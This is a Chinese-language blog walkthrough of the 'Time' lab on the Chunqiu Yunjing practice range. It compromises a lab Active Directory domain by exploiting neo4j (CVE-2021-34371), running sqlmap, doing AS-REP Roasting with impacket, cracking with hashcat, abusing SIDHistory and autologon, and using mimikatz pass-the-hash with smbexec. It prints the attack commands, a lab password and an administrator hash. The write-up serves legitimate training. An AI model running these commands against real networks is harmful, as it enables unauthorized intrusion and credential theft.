春秋云镜Time打靶记录

207次阅读
没有评论

共计 1146 个字符,预计需要花费 3 分钟才能阅读完成。

渗透路径:
neo4j 打 CVE 获得立足点 ->sqlmap 梭出域环境账号 ->Kerberos AS-REP Roasting 攻击 获取加密凭证 -> 通过 SIDHistory 以及自动登录留下的凭证获取更高权限 ->pth 拿下域控

还是端口扫描
春秋云镜 Time 打靶记录

打到一半重开了一下靶机所以,IP 变了 39.98.109.138

观察靶机开放的端口,发现部署了 neo4j。
看一下,很老的版本了。直接打 CVE
春秋云镜 Time 打靶记录
https://github.com/zwjjustdoit/CVE-2021-34371.jar
java -jar ./rhino_gadget.jar rmi:// 靶机 IP:1337 "命令"
直接就拿下 flag 了
春秋云镜 Time 打靶记录
python 起个 http 服务然后下载 vshell,方便起代理和交互

春秋云镜 Time 打靶记录

用 stoaway 也行,但是我懒

fscan 传上去扫下内网
春秋云镜 Time 打靶记录
发现一个后台登录界面,直接 SQLMAP 跑一下试试
春秋云镜 Time 打靶记录

记得在 conf 文件里面配置代理

proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123"

dump 出 flag 和用户
春秋云镜 Time 打靶记录

春秋云镜 Time 打靶记录

竟然有一堆账号,然后就来打另一台 Windows 机器了

Kerberos AS-REP Roasting 攻击:这是一个针对 Kerberos 认证协议的攻击方法,主要目标是尝试从 Active Directory 获取不需要预身份验证的用户的加密凭证信息。这种攻击可以尝试暴力破解密码,特别是针对没有配置 Kerberos 预身份验证的用户账户。
proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

拿到 NTML
春秋云镜 Time 打靶记录

使用 hashcat 爆破出密码
春秋云镜 Time 打靶记录

直接 RDP 远程连接上另一台主机
春秋云镜 Time 打靶记录
使用 bloodhound 做信息搜集

SIDHistory 是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的 SID 作为该对象的 objectSid,在之前域中的 SID 会添加到该对象的 sIDHistory 属性中,此时该对象将保留在原来域的 SID 对应的访问权限

春秋云镜 Time 打靶记录

春秋云镜 Time 打靶记录

YUXUAN 是自动登录用户
可以直接找到密码

春秋云镜 Time 打靶记录

我们可以通过他登录
用 yuxuan@xiaorang.lab/Yuxuan7QbrgZ3L 重连 RDP
然后上传 mimikatz 打 pth
春秋云镜 Time 打靶记录

获取了 admin 的 hash 后使用 smbexec 取得 shell
proxychains4 python3 smbexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk
春秋云镜 Time 打靶记录

然后继续 pth 拿下域控
春秋云镜 Time 打靶记录

正文完
 0
Rycarl
版权声明:本站原创文章,由 Rycarl 于2026-02-22发表,共计1146字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)
验证码